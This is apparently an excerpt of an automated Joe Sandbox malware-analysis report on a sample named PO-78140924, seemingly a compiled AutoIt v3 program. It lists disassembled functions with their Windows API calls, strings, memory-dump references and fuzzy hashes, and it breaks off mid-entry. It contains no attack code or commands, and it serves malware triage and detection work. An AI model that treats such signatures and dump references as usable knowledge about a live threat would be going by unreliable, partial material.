                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 000129D5
                                                  • Part of subcall function 00012344: GetCursorPos.USER32(?), ref: 00012357
                                                  • Part of subcall function 00012344: ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 000129FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 834edc5586d2a957e5964c067f41a456c27fc6b39d1e166fed70894dcebdaabb
                                                • Instruction ID: be0ea220b9c5d51f42b2dbfc1b8a1e019cef9f50b12b69fe539d2a3a1a7932a5
                                                • Opcode Fuzzy Hash: 834edc5586d2a957e5964c067f41a456c27fc6b39d1e166fed70894dcebdaabb
                                                • Instruction Fuzzy Hash: E3B17D71A0160AEFEB54DFA8DD45BED7BB4FB08311F10422AFA15E72A0DB749851CB60
                                                Function 00025F88 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 348COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                • GetForegroundWindow.USER32 ref: 00026042
                                                • IsWindow.USER32(?), ref: 00060F79
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$Foreground_memmove
                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                • API String ID: 3828923867-1919597938
                                                • Opcode ID: 12cf257afd6202a2f4a899d0254b276fe42fb0a4f803c66f88504e245e6b6f33
                                                • Instruction ID: f6b82622b7f7403258d908117008210c7dc0e9b960e3884e6babae0e0808a366
                                                • Opcode Fuzzy Hash: 12cf257afd6202a2f4a899d0254b276fe42fb0a4f803c66f88504e245e6b6f33
                                                • Instruction Fuzzy Hash: 56D1C730108702ABCB64EF20C8919EFBBE6BF54340F14462DF45A575A3DB31EA99CB91
                                                Function 0006AFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: d6a94df104afa6def5ca134d4211eb18c83c88d59a410a6ff3d8702867e3ee36
                                                • Instruction ID: 986aa70163a60160c64af93959dd34a43c9c916bf329a15064c772a1f69306d5
                                                • Opcode Fuzzy Hash: d6a94df104afa6def5ca134d4211eb18c83c88d59a410a6ff3d8702867e3ee36
                                                • Instruction Fuzzy Hash: BB31A271A48209A6EB24EB61CC53FEF77B99F10710F600419B529B90D3EF616F84CA52
                                                Function 000145DF Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 000145F9
                                                • GetMenuItemCount.USER32(000D5890), ref: 0004D6FD
                                                • GetMenuItemCount.USER32(000D5890), ref: 0004D7AD
                                                • GetCursorPos.USER32(?), ref: 0004D7F1
                                                • SetForegroundWindow.USER32(00000000), ref: 0004D7FA
                                                • TrackPopupMenuEx.USER32(000D5890,00000000,?,00000000,00000000,00000000), ref: 0004D80D
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0004D819
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID: 0
                                                • API String ID: 2751501086-4108050209
                                                • Opcode ID: b318c171d99709cc9504c544cf58c3fb3b71cbf3033a8578d258cd1247d83edb
                                                • Instruction ID: 58d152e8a36cbfc7cb208d8f915cb106ac2daf98b82cc5fc2cdbdd3c498d00b8
                                                • Opcode Fuzzy Hash: b318c171d99709cc9504c544cf58c3fb3b71cbf3033a8578d258cd1247d83edb
                                                • Instruction Fuzzy Hash: 7971D270604205BFEB309F54DC45FEABFA4FB05368F204227F619A61E1C7B56860DB59
                                                Function 000482F0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 179fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __set_osfhnd.LIBCMT ref: 00048304
                                                  • Part of subcall function 0003D6AA: SetStdHandle.KERNEL32(000000F6,00048309,00000001,0009FB24,00000000,?,00048309,0009FB24,00000040,?,?,?,?,?,00000000,00000109), ref: 0003D6FD
                                                • __lseeki64_nolock.LIBCMT ref: 0004836E
                                                  • Part of subcall function 00038C74: __getptd_noexit.LIBCMT ref: 00038C74
                                                • __close_nolock.LIBCMT ref: 00048394
                                                  • Part of subcall function 00040C5D: CloseHandle.KERNELBASE(00000000,0009FB24,00000000,?,00048399,0009FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00040CAD
                                                  • Part of subcall function 00040C5D: GetLastError.KERNEL32(?,00048399,0009FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00040CB7
                                                  • Part of subcall function 00040C5D: __free_osfhnd.LIBCMT ref: 00040CC4
                                                  • Part of subcall function 00040C5D: __dosmaperr.LIBCMT ref: 00040CE6
                                                • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 0004869A
                                                • ___createFile.LIBCMT ref: 000486B9
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000486C6
                                                • __dosmaperr.LIBCMT ref: 000486CD
                                                • __free_osfhnd.LIBCMT ref: 000486ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Handle$CloseErrorLast__dosmaperr__free_osfhnd$File___create__close_nolock__getptd_noexit__lseeki64_nolock__set_osfhnd
                                                • String ID: @$t"=$t"=$t)=$t)=$tD=
                                                • API String ID: 3527355902-3051076874
                                                • Opcode ID: 2b870520fc452498776de6f5a13cd4a90052098437077cb1591a862899850520
                                                • Instruction ID: f2fe361aa1597dc4749b2867442c2e18181872a8ced39e2282961b75a21c73d6
                                                • Opcode Fuzzy Hash: 2b870520fc452498776de6f5a13cd4a90052098437077cb1591a862899850520
                                                • Instruction Fuzzy Hash: 00518AB19051025BDF69CF18E8917FC7BA1AB41310F19CA79EA61AB3D2CF3A8D50C749
                                                Function 0007281F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 190windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0007283A
                                                • GetMenuItemInfoW.USER32(000D5890,000000FF,00000000,00000030), ref: 0007289B
                                                • SetMenuItemInfoW.USER32(000D5890,00000004,00000000,00000030), ref: 000728D1
                                                • Sleep.KERNEL32(000001F4), ref: 000728E3
                                                • GetMenuItemCount.USER32(?), ref: 00072927
                                                • GetMenuItemID.USER32(?,00000000), ref: 00072943
                                                • GetMenuItemID.USER32(?,-00000001), ref: 0007296D
                                                • GetMenuItemID.USER32(?,?), ref: 000729B2
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000729F8
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00072A0C
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00072A2D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID: 0
                                                • API String ID: 4176008265-4108050209
                                                • Opcode ID: 7d121a74dd6323fbbd2c8093d1ddb69aecb6c403ec43fd7e5fbe16d72ad68ed4
                                                • Instruction ID: 22c926b36c4f10a0dba286c6e4f89c3a5fd198a932e2429b66c7c8322b15ab03
                                                • Opcode Fuzzy Hash: 7d121a74dd6323fbbd2c8093d1ddb69aecb6c403ec43fd7e5fbe16d72ad68ed4
                                                • Instruction Fuzzy Hash: BD61C170D00249AFEB61CF64CC88EBE7BB8FB45304F14806AF946A3251D739AD45DB25
                                                Function 000483C9 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __close_nolock.LIBCMT ref: 00048394
                                                • __lseeki64_nolock.LIBCMT ref: 000483D6
                                                • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 0004869A
                                                • ___createFile.LIBCMT ref: 000486B9
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000486C6
                                                • __dosmaperr.LIBCMT ref: 000486CD
                                                • __free_osfhnd.LIBCMT ref: 000486ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CloseErrorFileHandleLast___create__close_nolock__dosmaperr__free_osfhnd__lseeki64_nolock
                                                • String ID: t"=$t"=$t)=$t)=$tD=
                                                • API String ID: 1689960631-2384938829
                                                • Opcode ID: 1690c2df269e4b53be1c94f2cf2557604e617211a0ee799dde8c32650593ff2e
                                                • Instruction ID: ed1576d16f81141702c165733651f70c19a5085b9bb1fa761924ef2f7fafe621
                                                • Opcode Fuzzy Hash: 1690c2df269e4b53be1c94f2cf2557604e617211a0ee799dde8c32650593ff2e
                                                • Instruction Fuzzy Hash: A25177F19011125BDF698F18E8917FD37A1AB41310F29CA39EA25E72E2CB39CD90C749
                                                Function 0006E488 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 404COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0006F1FE: VariantInit.OLEAUT32(?), ref: 0006F218
                                                  • Part of subcall function 0006F1FE: VariantClear.OLEAUT32(00000013), ref: 0006F28A
                                                  • Part of subcall function 0006F1FE: VariantClear.OLEAUT32(?), ref: 0006F35C
                                                • VariantClear.OLEAUT32(?), ref: 0006E580
                                                • VariantInit.OLEAUT32(?), ref: 0006E5E3
                                                  • Part of subcall function 0006F09A: SysStringLen.OLEAUT32(?), ref: 0006F0A7
                                                  • Part of subcall function 0006F09A: lstrcpyW.KERNEL32(00000000,?,?,0006E43F,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0006F0D8
                                                • VariantClear.OLEAUT32(?), ref: 0006E442
                                                • VariantClear.OLEAUT32(?), ref: 0006E464
                                                  • Part of subcall function 0006EF15: CLSIDFromString.COMBASE(?,00000000), ref: 0006EF37
                                                • DispCallFunc.OLEAUT32(00000008,?,?,00000015,?,?,?,?), ref: 0006E649
                                                • VariantClear.OLEAUT32(?), ref: 0006E65B
                                                • VariantCopy.OLEAUT32(?,?), ref: 0006E6C7
                                                  • Part of subcall function 0006F16B: VariantCopyInd.OLEAUT32(?,?), ref: 0006F195
                                                  • Part of subcall function 0006F16B: VariantClear.OLEAUT32(?), ref: 0006F1AC
                                                • VariantClear.OLEAUT32(?), ref: 0006E752
                                                • VariantClear.OLEAUT32(?), ref: 0006E76B
                                                • VariantClear.OLEAUT32(?), ref: 0006E7F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$CopyInitString$CallDispFromFunclstrcpy
                                                • String ID: $@
                                                • API String ID: 691162671-3337466569
                                                • Opcode ID: 92082985d704e32ae4323aae97aa1631bcc5705fdadeb3fad7612fc57f774044
                                                • Instruction ID: 5f153b662f832a743f75ea947c040707dc26475274a020186ee1194a9ab050e4
                                                • Opcode Fuzzy Hash: 92082985d704e32ae4323aae97aa1631bcc5705fdadeb3fad7612fc57f774044
                                                • Instruction Fuzzy Hash: D3E1CCB9A04351AFD760DF28C884A6ABBE5FF88754F10482EFA85D7261D730EC45CB52
                                                Function 00079CC2 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00079D09
                                                  • Part of subcall function 00017F41: _memmove.LIBCMT ref: 00017F82
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00079D2A
                                                • _wprintf.LIBCMT ref: 00079E43
                                                • _wprintf.LIBCMT ref: 00079E61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 3536794898-3080491070
                                                • Opcode ID: 9f6a3376bc4e51ff9a727eea6066942115441700862eae85482f95a88aba048e
                                                • Instruction ID: 4b3fbea9ea8a46739e7dbb349e3f2d49a2bc9082f5bd09043eb6716b2fb70938
                                                • Opcode Fuzzy Hash: 9f6a3376bc4e51ff9a727eea6066942115441700862eae85482f95a88aba048e
                                                • Instruction Fuzzy Hash: 9F519431D00609AADF15EBE0CD82EEEB7B9AF08300F544165F50976092DF752F99DBA1
                                                Function 000746F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: f0e9df693a9967cc43f5e8905c9adf49a9741484a1262d4e894b33e37fea23db
                                                • Instruction ID: fa9141b5b74a0555e2e7ad8554f446961789558f3b0123f468037b4e9fbe01fb
                                                • Opcode Fuzzy Hash: f0e9df693a9967cc43f5e8905c9adf49a9741484a1262d4e894b33e37fea23db
                                                • Instruction Fuzzy Hash: BA110531A081056FDB25A7609C4AEEA77ECEB02711F0041B6F548D6092EF789A81C654
                                                Function 000121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • GetSysColor.USER32(0000000F), ref: 000121D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: f0593db1eef8d5621d674fe2221761916609e202dabe935a6cc434365b27e9c8
                                                • Instruction ID: 94bf11fc9b4f62490d6e2c7331fba77eca185ce90ab48af0e9b79a74d3207d3d
                                                • Opcode Fuzzy Hash: f0593db1eef8d5621d674fe2221761916609e202dabe935a6cc434365b27e9c8
                                                • Instruction Fuzzy Hash: E7418231100540EBEB655F28EC88BFD3BA5EB06731F184276FE658A1E5C7358CA2DB61
                                                Function 00036F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00036FBB
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • __gmtime64_s.LIBCMT ref: 00037054
                                                • __gmtime64_s.LIBCMT ref: 0003708A
                                                • __gmtime64_s.LIBCMT ref: 000370A7
                                                • __allrem.LIBCMT ref: 000370FD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00037119
                                                • __allrem.LIBCMT ref: 00037130
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0003714E
                                                • __allrem.LIBCMT ref: 00037165
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00037183
                                                • __invoke_watson.LIBCMT ref: 000371F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: 4d22540c68ea1db1b5775825e39e2d75ecb8b9a36265a6d6dcb95d4495ed4413
                                                • Instruction ID: f5073ea944dd73c2d27994ec6f05a38161db8198cb718c998f46f0bb176a9a04
                                                • Opcode Fuzzy Hash: 4d22540c68ea1db1b5775825e39e2d75ecb8b9a36265a6d6dcb95d4495ed4413
                                                • Instruction Fuzzy Hash: EC711AB2A00716AFE7259E7DCC41B9AB3ECAF01320F148139F518D7282E771D9408BD0
                                                Function 00066EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00066F15
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00066F6E
                                                • VariantInit.OLEAUT32(?), ref: 00066F80
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00066FA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 00066FF3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00067007
                                                • VariantClear.OLEAUT32(?), ref: 0006701C
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00067029
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00067032
                                                • VariantClear.OLEAUT32(?), ref: 00067044
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0006704F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
